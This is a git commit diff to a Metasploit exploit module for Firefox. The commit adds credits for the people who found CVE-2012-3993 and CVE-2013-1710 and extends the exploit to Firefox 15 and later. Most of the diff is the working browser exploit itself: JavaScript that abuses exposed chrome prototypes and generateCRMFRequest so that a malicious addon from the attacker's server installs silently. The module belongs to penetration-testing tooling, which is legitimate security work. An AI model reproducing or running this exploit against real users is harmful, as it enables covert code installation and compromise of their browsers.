Add a patch for 15.x support.

* Also add authors i forgot, oops
2013-12-19 02:05:45 -06:00 · 2013-12-19 02:05:45 -06:00 · 5ee6c77901
parent 2add2acc8f
commit 5ee6c77901
1 changed files with 51 additions and 36 deletions
--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@ -29,7 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
        API is invoked to silently install a malicious plugin.
      },
      'License' => MSF_LICENSE,
-      'Author'  => [ 'joev' ],
+      'Author'  => [
+        'Mariusz Mlynski', # discovered CVE-2012-3993
+        'moz_bug_r_a4', # discovered CVE-2013-1710
+        'joev' # metasploit module
+      ],
      'References' => [
        ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
        ['OSVDB', '86111'],
@ -54,41 +58,52 @@ class Metasploit3 < Msf::Exploit::Remote

  def generate_html
    %Q|
-<html>
-<body>
-#{datastore['CONTENT']} 
-<div id='payload' style='display:none'>
-window.AddonManager.getInstallForURL(
-  '#{get_uri}/addon.xpi',
-  function(install) { install.install() },
-  'application/x-xpinstall'
-);
-</div>
-<script>
-try{InstallTrigger.install(0)}catch(e){p=Object.getPrototypeOf(Object.getPrototypeOf(e));};
-p.__exposedProps__={
-  constructor:'rw',
-  prototype:'rw',
-  defineProperty:'rw',
-  __exposedProps__:'rw'
-};
-var s = document.querySelector('#payload').innerHTML;
-var q = false;
-var register = function(obj,key) {
-  var runme = function(){
-    if (q) return;
-    q = true;
-    window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
-  };
-  try {
-    p.constructor.defineProperty(obj,key,{get:runme});
-  } catch (e) {}
-};
-for (var i in window) register(window, i);
-for (var i in document) register(document, i);
-</script>
-</body>
-</html>
+      <html>
+      <body>
+      #{datastore['CONTENT']} 
+      <div id='payload' style='display:none'>
+      if (!window.done){
+        window.AddonManager.getInstallForURL(
+          '#{get_uri}/addon.xpi',
+          function(install) { install.install() },
+          'application/x-xpinstall'
+        );
+        window.done = true;
+      }
+      </div>
+      <script>
+      try{InstallTrigger.install(0)}catch(e){p=e;};
+      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
+      p2.__exposedProps__={
+        constructor:'rw',
+        prototype:'rw',
+        defineProperty:'rw',
+        __exposedProps__:'rw'
+      };
+      var s = document.querySelector('#payload').innerHTML;
+      var q = false;
+      var register = function(obj,key) {
+        var runme = function(){
+          if (q) return;
+          q = true;
+          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
+        };
+        ver = (navigator.userAgent.match(/firefox\\/([\\d]+)/i) \|\| [])[1];
+        if(ver&&ver>=15) {
+          try {
+            Function.prototype.call.call(p.__defineGetter__,obj,key,runme);
+          } catch (e) {}
+        } else {
+          try {
+            p2.constructor.defineProperty(obj,key,{get:runme});
+          } catch (e) {}
+        }
+      };
+      for (var i in window) register(window, i);
+      for (var i in document) register(document, i);
+      </script>
+      </body>
+      </html>
    |
  end
 end